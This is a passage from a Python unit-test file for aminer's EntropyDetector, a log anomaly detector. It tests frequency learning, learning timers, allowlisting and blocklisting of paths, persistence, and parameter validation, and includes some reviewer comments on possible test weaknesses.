["y", [["!", 1032], [" ", 118640], ["\"", 62], ["'", 1440], [")", 154], ["-", 2010], [",", 18388], [".", 10860], [";", 1366], [":", 466], ["?", 946], [">", 26], ["]", 2], ["_", 4], ["a", 2624], ["`", 2], ["c", 242], ["b", 640], ["e", 11272], ["d", 206], ["g", 138], ["f", 198], ["i", 4422], ["h", 84], ["k", 76], ["m", 714], ["l", 818], ["o", 28106], ["n", 212], ["p", 410], ["s", 8723], ["r", 738], ["u", 58], ["t", 3028], ["w", 464], ["v", 110], ["x", 14], ["z", 40]]], ["}", [[" ", 6], [",", 2]]]]] freq = {} total_freq = {} for elem in default_f[2]: first_char = int.from_bytes(bytes(elem[0], "utf-8"), "big") second_char_list = elem[1] freq[first_char] = {} total_freq[first_char] = 0 for second_char_elem in second_char_list: second_char = int.from_bytes(bytes(second_char_elem[0], "utf-8"), "big") frequency = second_char_elem[1] freq[first_char][second_char] = frequency total_freq[first_char] += frequency ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) 
ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # skip_repetitions = True ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], skip_repetitions=True, learn_mode=True, output_logline=False) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), 
freq, total_freq)
        self.assertEqual(ed.total_freq, total_freq)
        self.assertEqual(ed.freq, freq)
        # frequencies should not change if skip_repetitions = True: feeding the identical atom a second
        # time must neither report anything nor touch the learned counts.
        ed.receive_atom(log_atom6)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(ed.total_freq, total_freq)
        self.assertEqual(ed.freq, freq)
        # stop_learning_time: learn_mode is switched off once an atom whose atom_time lies past the
        # configured cut-off arrives (t + 99 still learns, t + 102 does not).
        ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], learn_mode=True, output_logline=False, stop_learning_time=100)
        self.assertTrue(ed.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(ed.receive_atom(log_atom1))
        self.assertTrue(ed.learn_mode)
        log_atom1.atom_time = t + 102
        self.assertTrue(ed.receive_atom(log_atom1))
        self.assertFalse(ed.learn_mode)
        # stop_learning_no_anomaly_time
        ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(ed.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(ed.receive_atom(log_atom1))
        self.assertTrue(ed.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(ed.receive_atom(log_atom2))
        self.assertTrue(ed.learn_mode)
        # NOTE(review): log_atom1.atom_time is advanced to t + 200 here, but the atom actually fed in is
        # log_atom3, whose atom_time is not touched in this step -- presumably `log_atom3.atom_time = t + 200`
        # was intended; verify what timestamp the detector sees before relying on this assertion.
        log_atom1.atom_time = t + 200
        self.assertTrue(ed.receive_atom(log_atom3))
        self.assertTrue(ed.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(ed.receive_atom(log_atom1))
        self.assertFalse(ed.learn_mode)

    def test2do_timer(self):
        """Test if the do_timer method is implemented properly.

        With next_persist_time pinned at t + 400, do_timer must report the seconds remaining until
        that point (t + 200 -> 200). Once the persist time is reached it hands back
        DEFAULT_PERSISTENCE_PERIOD again. The subsequent t + 999 -> 1 and t + 1000 ->
        DEFAULT_PERSISTENCE_PERIOD checks only hold if the period is 600 s, i.e. the next persist was
        rescheduled to t + 1000 by the call at t + 400.
        """
        ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"])
        t = time.time()
        ed.next_persist_time = t + 400
        self.assertEqual(ed.do_timer(t + 200), 200)
        self.assertEqual(ed.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(ed.do_timer(t + 999), 1)
        self.assertEqual(ed.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """Test if the allowlist_event method is implemented properly.

        Allowlisting a path appends it to constraint_list (also when learn_mode is off) and returns
        a confirmation string. Events addressed to a different detector class, and calls that carry
        allowlisting data, are rejected with an exception.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"])
        analysis = "Analysis.%s"
        # NOTE(review): assertRaises(Exception, ...) is broad -- it also passes on an unrelated TypeError or
        # AttributeError, so a regression in the rejection path would go unnoticed; pinning the concrete
        # exception type raised by allowlist_event would make this negative test meaningful.
        self.assertRaises(Exception, ed.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The EntropyDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, ed.allowlist_event, analysis % ed.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(ed.allowlist_event(analysis % ed.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % ed.__class__.__name__))
        self.assertEqual(ed.constraint_list, ["/s1"])
        # Allowlisting must also work once learning is switched off.
        ed.learn_mode = False
        self.assertEqual(ed.allowlist_event(analysis % ed.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % ed.__class__.__name__))
        self.assertEqual(ed.constraint_list, ["/s1", "/d1"])

    def test4blocklist_event(self):
        """Test if the blocklist_event method is implemented properly.

        Mirror of test3allowlist_event: blocklisting a path appends it to ignore_list (also when
        learn_mode is off) and returns a confirmation string. Events addressed to a different
        detector class, and calls that carry blocklisting data, are rejected with an exception.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"])
        analysis = "Analysis.%s"
        # NOTE(review): as in test3allowlist_event, asserting the bare Exception type is broad; pin the
        # concrete exception raised by blocklist_event so an unrelated error cannot satisfy the check.
        self.assertRaises(Exception, ed.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The EntropyDetector can not handle blocklisting data and therefore an exception is expected.
        self.assertRaises(Exception, ed.blocklist_event, analysis % ed.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(ed.blocklist_event(analysis % ed.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % ed.__class__.__name__))
        self.assertEqual(ed.ignore_list, ["/s1"])
        # Blocklisting must also work once learning is switched off.
        ed.learn_mode = False
        self.assertEqual(ed.blocklist_event(analysis % ed.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % ed.__class__.__name__))
        self.assertEqual(ed.ignore_list, ["/s1", "/d1"])

    def test5persistence(self):
        """Test the do_persist and load_persistence_data methods.

        Six values are learned, written out with do_persist, and the persistence file is compared
        verbatim against the expected content: a plain JSON array of
        [byte_value, [[next_byte_value, count], ...]] entries in which -1 marks the start and the
        end of a value (three values start with 'a' = 97, two end in 'r' = 114). The in-memory
        counts are then wiped, restored with load_persistence_data and compared against the
        reference built by self.add_data; finally a freshly constructed detector must come up with
        the same state, i.e. persisted data is picked up at construction time.
        """
        t = time.time()
        ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.05, learn_mode=True, output_logline=False)
        log_atom1 = LogAtom(b"aminer", ParserMatch(MatchElement("/value", b"aminer", b"aminer", None)), t + 1, None)
        log_atom2 = LogAtom(b"logdata-anomaly-miner", ParserMatch(MatchElement("/value", b"logdata-anomaly-miner", b"logdata-anomaly-miner", None)), t + 2, None)
        log_atom3 = LogAtom(b"ait-aecid", ParserMatch(MatchElement("/value", b"ait-aecid", b"ait-aecid", None)), t + 3, None)
        log_atom4 = LogAtom(b"austrian", ParserMatch(MatchElement("/value", b"austrian", b"austrian", None)), t + 4, None)
        log_atom5 = LogAtom(b"institute", ParserMatch(MatchElement("/value", b"institute", b"institute", None)), t + 5, None)
        log_atom6 = LogAtom(b"lfmvasacz", ParserMatch(MatchElement("/value", b"lfmvasacz", b"lfmvasacz", None)), t + 6, None)
        total_freq = {}
        freq = {}
        # Build the reference counts alongside the detector with the test helper add_data.
        ed.receive_atom(log_atom1)
        self.add_data(log_atom1.raw_data.decode(), freq, total_freq)
        ed.receive_atom(log_atom2)
        self.add_data(log_atom2.raw_data.decode(), freq, total_freq)
        ed.receive_atom(log_atom3)
        self.add_data(log_atom3.raw_data.decode(), freq, total_freq)
        ed.receive_atom(log_atom4)
        self.add_data(log_atom4.raw_data.decode(), freq, total_freq)
        ed.receive_atom(log_atom5)
        self.add_data(log_atom5.raw_data.decode(), freq, total_freq)
        ed.receive_atom(log_atom6)
        self.add_data(log_atom6.raw_data.decode(), freq, total_freq)
        ed.do_persist()
        # NOTE(review): this leaves learned state on disk under the detector's default persistence id; any
        # later test that constructs an EntropyDetector against the same config inherits it unless
        # setUp/tearDown resets the persistence directory -- verify the harness does.
        with open(ed.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[[-1, [[97, 3], [108, 2], [105, 1]]], [97, [[109, 1], [116, 1], [45, 1], [110, 2], [108, 1], [105, 1], [101, 1], [117, 1], [115, 1], [99, 1]]], [109, [[105, 2], [97, 1], [118, 1]]], [105, [[110, 3], [116, 2], [100, 1], [97, 1]]], [110, [[101, 2], [111, 1], [-1, 1], [115, 1]]], [101, [[114, 2], [99, 1], [-1, 1]]], [114, [[-1, 2], [105, 1]]], [108, [[111, 1], [121, 1], [102, 1]]], [111, [[103, 1], [109, 1]]], [103, [[100, 1]]], [100, [[97, 1], [-1, 1]]], [116, [[97, 1], [45, 1], [114, 1], [105, 1], [117, 1], [101, 1]]], [45, [[97, 2], [109, 1]]], [121, [[45, 1]]], [99, [[105, 1], [122, 1]]], [117, [[115, 1], [116, 1]]], [115, [[116, 2], [97, 1]]], [102, [[109, 1]]], [118, [[97, 1]]], [122, [[-1, 1]]]]')
        self.assertEqual(ed.total_freq, total_freq)
        self.assertEqual(ed.freq, freq)
        # Wipe the in-memory state and make sure it is fully restored from the file.
        ed.total_freq = {}
        ed.freq = {}
        ed.load_persistence_data()
        self.assertEqual(ed.total_freq, total_freq)
        self.assertEqual(ed.freq, freq)
        # A new instance with the same configuration must load the persisted counts on construction.
        other = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.05, learn_mode=True, output_logline=False)
        self.assertEqual(other.total_freq, ed.total_freq)
        self.assertEqual(other.freq, ed.freq)

    def test6validate_parameters(self):
        """Test all initialization parameters for the detector.
Input parameters must be validated in the class.""" self.assertRaises(TypeError, EntropyDetector, self.aminer_config, ["default"], ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, None, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, "", ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, b"Default", ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, True, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, 123, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, 123.3, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, (), ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, set(), ["/model/value"]) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], [""]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], set()) 
self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=-1) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=1.1) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh="123") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=0) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=0.5) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=1) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], 
["/model/value"], default_freqs=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], skip_repetitions=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=True) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], persistence_id=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=None) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline="True") 
self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], output_logline=True) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, 
EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[]) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=None) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=[""]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123.3) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], 
["/model/value"], constraint_list=[]) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=None) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, 
[self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100, 
stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], log_resource_ignore_list=set()) EntropyDetector(self.aminer_config, 